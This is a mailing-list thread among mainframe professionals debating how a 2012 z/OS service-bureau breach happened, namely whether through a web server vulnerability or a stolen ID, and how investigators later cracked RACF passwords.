> And yes, it was a z/OS vulnerability. Are you saying that Bob Bridges was wrong when he wrote "The stolen ID also had read access to the RACF database.."? It's not a vulnerability of the lock when you leave your key on the porch for anyone to use.
-- Shmuel (Seymour J.) Metz http://mason.gmu.edu/~smetz3 ________________________________________ From: IBM Mainframe Discussion List <IBM-MAIN@LISTSERV.UA.EDU> on behalf of Charles Mills <charl...@mcn.org> Sent: Thursday, May 9, 2019 2:20 PM To: IBM-MAIN@LISTSERV.UA.EDU Subject: Re: Can backup mechanisms be used to steal RACF database? was Re: mainframe hacking "success stories"? I have read the entire, very thorough police report, as has Chad R. Phil Young has done considerable research on this. There were two parts to it. Svartholm somehow got the MPAA lawyer's user login for the Infotorg legal database, hosted on USS. (The "somehow" may be known but I do not know or recall it.) That userid was insignificant to the overall integrity of the Z box. He was able to harass the lawyer by changing her password, etc., etc., but that was all. No real threat to system integrity. It would be like if I had the userid and password for one of your vanilla CICS users. Not good, but not the end of the world. He leveraged that, via the http vulnerability, into pwning the whole box: multiple RACF SPECIAL id's, etc., etc. That was the huge, huge, huge problem for the service bureau. So the z/OS vulnerability was the key here, not one random userid. And yes, it was a z/OS vulnerability. It was a zero-day defect in system software running as a service of z/OS. If that's not a z/OS vulnerability I don't know what is. Charles -----Original Message----- From: IBM Mainframe Discussion List [mailto:IBM-MAIN@LISTSERV.UA.EDU] On Behalf Of Bob Bridges Sent: Thursday, May 9, 2019 10:28 AM To: IBM-MAIN@LISTSERV.UA.EDU Subject: Re: Can backup mechanisms be used to steal RACF database? was Re: mainframe hacking "success stories"? I believe Peter's right. The hackers got a stolen ID with some RACF power, by means not positively identified but social engineering is as likely as any other hypothesis. (I read ~speculation~ about an HTTP vulnerability, but the forensic investigators never established how the initial breakin occurred.) Once they were in, they fooled around in OMVS and were able to get more power. The stolen ID also had read access to the RACF database. "There are also solid indications that they downloaded the RACF database (about 28MB)....Once they’d downloaded the RACF database, they subjected it to a password-cracking tool....On Feb 28, about the same time the RACF database was downloaded, some questions appeared on the mailing list PaulDotCom about hashing methods for RACF; by March 3rd, apparently in response, John the Ripper had been enhanced to include the capability of working on RACF passwords, in collaboration with another tool call CRACF....By way of testing, investigators attempted to use these tools themselves to crack RACF passwords. They found that a great many passwords could be extracted, that they were easy to discover by dictionary attack, that they were not very complex and in many cases that they’d been unchanged from the default when the ID was created. Using a standalone PC they cracked about 30 000 passwords (out of 120 000 on Applicat’s database) in 'a couple of days'." So yeah, the investigators did it too, but just to establish how effective might be the new version of John the Ripper. --- Bob Bridges, robhbrid...@gmail.com, cell 336 382-7313 /* Be careful of your thoughts; they may become words at any moment. -Ira Gassen */ -----Original Message----- From: IBM Mainframe Discussion List [mailto:IBM-MAIN@LISTSERV.UA.EDU] On Behalf Of Charles Mills Sent: Thursday, May 9, 2019 11:39 No. Read the original thread here. It was a vulnerability in a Web server. Hacking the RACF database was done well after the fact, by investigators. -----Original Message----- From: IBM Mainframe Discussion List [mailto:IBM-MAIN@LISTSERV.UA.EDU] On Behalf Of Peter Vander Woude Sent: Thursday, May 9, 2019 6:56 AM That's what happened in the Swedish bank hack, back in 2012. In that, once they got the database copy on their pc, they used hacker tools that are out there, to crack all the passwords. ---------------------------------------------------------------------- For IBM-MAIN subscribe / signoff / archive access instructions, send email to lists...@listserv.ua.edu with the message: INFO IBM-MAIN ---------------------------------------------------------------------- For IBM-MAIN subscribe / signoff / archive access instructions, send email to lists...@listserv.ua.edu with the message: INFO IBM-MAIN ---------------------------------------------------------------------- For IBM-MAIN subscribe / signoff / archive access instructions, send email to lists...@listserv.ua.edu with the message: INFO IBM-MAIN
